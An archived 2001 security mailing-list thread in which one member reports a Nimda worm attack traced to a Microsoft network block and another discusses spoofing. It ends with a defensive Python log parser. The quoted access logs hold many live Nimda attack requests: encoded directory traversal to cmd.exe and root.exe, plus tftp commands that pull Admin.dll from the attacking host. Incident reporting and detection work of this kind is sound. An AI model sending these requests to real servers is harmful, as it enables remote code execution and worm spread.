Security Incidents mailing list archives

Re: Microsoft's Early Xmas Present.


From: "mcoleman" <mcoleman () uniontown com>
Date: Sun, 30 Dec 2001 02:05:43 -0500

Hi Jay,

     These logs you included appear to be logs from the web server itself,
correct?  Or, are these logs from something else that formats them this way?

     If these are the actual web server logs, then my point might be
somewhat moot, but it could be trivial to fake M$'s source IP address in a
GET request to possibly trick your early bird software to give you and M$ a
holiday assache.

     If these are logs from the web server itself, then the 3-way handshake
must have happened and that is really hard to spoof source IP without
predictable sequence numbers, maybe someone spoofing directly upstream from
you?  If you don't have stateful protection on your firewall and your
earlybird software just sniffs signatures off of the wire like Snort does,
then someone could generate SYNed/ACKed packets (to get past Established
Filters) containing Nimda GET requests using whatever source IP they wanted,
and could maybe trick a "signature sniffing" reporting system, and your web
server would just ignore them...?

    Then, there's always the possibility that M$ got infected, but you have
to consider all angles.  Far be it from me to defend M$, but you have to keep
an open mind about everything these days.  I don't believe anything unless
it is proven.  Completion of a 3-way handshake would be strong evidence for
me though.

     On a whim, I would consider looking up www.whitehouse.gov and see if
the earlybird saw and reported attacks from that network as well, as this
would likely be another target that a trickster would use to try to embarrass
you.

     That early bird software is a great idea, but I see it easily abused
unless strong precautions are in place.  I am sorry I am not familiar with
that software, it may be much deeper than I am giving it credit for, I just
thought it important to throw this possibility to you tonight in case that
is what is happening.  Good luck... please let us know the outcome of this.

-Mark Coleman


-----Original Message-----
From: Jay D. Dyson <jdyson () treachery net>
To: Incidents List <incidents () securityfocus com>
Date: Saturday, December 29, 2001 11:27 PM
Subject: Microsoft's Early Xmas Present.


-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

I got a Nimda intrusion attempt.

Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

For those who are interested, here's the log excerpt.

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
  One Microsoft Way
  Redmond, WA 98052
  US

  Netname: UU-208-229-100-D1
  Netblock: 208.229.100.0 - 208.229.101.255

  Coordinator:
     Steig, Rick  (RS8676-ARIN)  a-rickst () MICROSOFT COM
     (425) 703-3061

  Record last updated on 03-Nov-1997.
  Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1. http://www.treachery.net/earlybird/
2. If anyone from Microsoft is reading this, I'd appreciate something
more pleasant next holiday season.  (FYI, the machine you hit ran
XP for only 15 seconds.  It now runs Linux.)

  (    (                                                        _______
  ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
C|~~|C|~~| (>----- Jay D. Dyson -- jdyson () treachery net -----<) |    = |-'
 `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----
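Added example (not code from either post, nor from Early Bird): a defender-side parser for the kind of access-log excerpt Jay quoted, in Python 3 with only the standard library. It assumes the NCSA combined format shown in the excerpt, percent-decodes each request path repeatedly so that double-encoded traversal (..%255c.. becomes ..%5c.. becomes ..\..) and the overlong byte sequences (%c0%af, %c1%1c) are surfaced, tags the indicators visible in the post (root.exe, cmd.exe, Admin.dll, a tftp fetch in the query string), and reports per source IP how many tagged requests the server actually answered with 200. The sample lines are constructed from the quoted excerpt (re-joined after the mail wrapping) plus one made-up benign request from 10.0.0.5 as a negative control.

```python
"""Parse NCSA combined access-log lines and tag Nimda-style requests."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote, unquote_to_bytes

# Constructed sample: five request lines taken from the quoted post, joined back
# onto single lines, plus one ordinary request from a made-up client (10.0.0.5).
SAMPLE_LOG = """\
208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
10.0.0.5 - - [24/Dec/2001:20:01:00 -0800] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

# NCSA combined format: ip ident user [timestamp] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# File names the worm asks for in the quoted excerpt (matched case-insensitively).
NIMDA_TARGETS = ("root.exe", "cmd.exe", "admin.dll")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["size"] = None if d["size"] == "-" else int(d["size"])
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d


def decode_path(uri, max_rounds=3):
    """Percent-decode the path part of a URI until it stops changing.

    Returns (decoded_bytes, rounds). rounds > 1 means the path was encoded more
    than once (e.g. %255c takes two rounds to become a backslash). The result is
    kept as bytes so invalid or overlong UTF-8 sequences are not silently replaced.
    """
    raw = uri.split("?", 1)[0].encode("ascii", "replace")
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
        rounds += 1
    return raw, rounds


def classify(entry):
    """Return the list of indicator tags that apply to one parsed entry."""
    path_bytes, rounds = decode_path(entry["uri"])
    path = path_bytes.decode("latin-1").lower()
    query = entry["uri"].split("?", 1)[1] if "?" in entry["uri"] else ""
    tags = []
    if any(t in path for t in NIMDA_TARGETS):
        tags.append("nimda-target")
    if "../" in path or "..\\" in path:
        tags.append("traversal")
    if rounds > 1:
        tags.append("double-encoded")
    if any(b >= 0x80 for b in path_bytes):
        tags.append("non-ascii-bytes")
    if "tftp" in unquote(query).lower():
        tags.append("tftp-fetch")
    return tags


def summarize(log_text):
    """Per source IP: total lines, tagged lines, tagged lines answered 200, time window."""
    per_ip = defaultdict(lambda: {"total": 0, "flagged": 0, "served_200": 0,
                                  "tags": set(), "first": None, "last": None})
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        s = per_ip[e["ip"]]
        s["total"] += 1
        s["first"] = e["ts"] if s["first"] is None else min(s["first"], e["ts"])
        s["last"] = e["ts"] if s["last"] is None else max(s["last"], e["ts"])
        tags = classify(e)
        if tags:
            s["flagged"] += 1
            s["tags"].update(tags)
            if e["status"] == 200:
                s["served_200"] += 1
    return dict(per_ip)


if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {s['flagged']}/{s['total']} tagged, {s['served_200']} answered 200, "
              f"tags={sorted(s['tags'])}, window={s['first']:%H:%M:%S}..{s['last']:%H:%M:%S}")
```

The served_200 count is the figure to weight when reading a report like the one above: a line in the web server's own log means the server completed the TCP handshake and answered, which is the evidence Mark's reply asks for, whereas a signature-only sniffer can be fed a packet carrying any source address. Repeated decoding matters for the same reason the excerpt shows several spellings of the same path: a rule that matches only the literal string "../" misses ..%255c.. and ..%c1%1c.. entirely.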


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com


